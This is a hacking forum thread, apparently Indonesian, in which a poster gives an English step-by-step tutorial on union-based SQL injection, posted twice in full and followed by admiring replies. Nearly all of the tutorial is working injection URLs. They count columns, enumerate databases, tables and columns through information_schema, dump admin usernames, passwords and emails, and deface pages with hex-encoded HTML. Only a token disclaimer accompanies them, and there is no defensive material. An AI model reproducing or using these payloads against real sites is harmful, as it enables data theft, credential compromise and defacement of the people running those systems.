[Tutorial] Advance SQL Injection
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
[Tutorial] Advance SQL Injection
This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.
2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.
3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".
Number 3 appear. So 3 is exploitable number.
4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.
5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.
6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".
7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc
9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
email
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learn how to dump from default database. So how about other database?
11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data
14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good
The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".
http://xyber-breaker.blogspot.com
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.
2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.
3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".
Number 3 appear. So 3 is exploitable number.
4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.
5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.
6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".
7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc
9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learn how to dump from default database. So how about other database?
11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data
14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good
The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".
http://xyber-breaker.blogspot.com
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
http://www.lumajangcrew.org
Re: Advance SQL Injection
amazing
Kembangkan minat mu dan buktikan kemampuan mu
Jangan Sesekali Mampir di http://elco.teknikelektronika.net dan http://replayfrom.wordpress.com
Trimakasih ya
Jangan Sesekali Mampir di http://elco.teknikelektronika.net dan http://replayfrom.wordpress.com
Trimakasih ya
Re: Advance SQL Injection
wuih.. ckckckck
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: [Tutorial] Advance SQL Injection
Ane dah prnah baca sih....He..
Keep share 0m... :kaca: :kaca:
lanjutkan prjalannya... :ngakak: :tapa:
Keep share 0m... :kaca: :kaca:
lanjutkan prjalannya... :ngakak: :tapa:
regards,
ordinary user,-
ordinary user,-
Re: [Tutorial] Advance SQL Injection
nebwe ikutan baca ya om...
Re: [Tutorial] Advance SQL Injection
@wiLMaR_kiDz, baca dimana bro?
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
http://www.lumajangcrew.org
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: [Tutorial] Advance SQL Injection
di : http://xyber-breaker.blogspot.com/2009/ ... ction.htmladwisatya wrote:@wiLMaR_kiDz, baca dimana bro?
alias blogny ente om...
sorry deh, alnya ane gk cek dulu c.. :putusasa: :putusasa:
jd malluw....
:malumalu: :malumalu: :malumalu:
regards,
ordinary user,-
ordinary user,-
Re: [Tutorial] Advance SQL Injection
mantap om hajar sekalian
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Re: [Tutorial] Advance SQL Injection
hhihihi,,
gak perlu malu om,, santai aja....
,,
kalau ada kekurangan, mohon ditambahkan ya..
gak perlu malu om,, santai aja....
,,
kalau ada kekurangan, mohon ditambahkan ya..
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
http://www.lumajangcrew.org
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [Tutorial] Advance SQL Injection
Weleh si abah maux maen hajar aja, aya naon atuh abah teh...???abah wrote:mantap om hajar sekalian
Ingat, abah teh udah tua, inget ma Kayla 'n Ummi aja di rumah abah...
...n0 l1m17...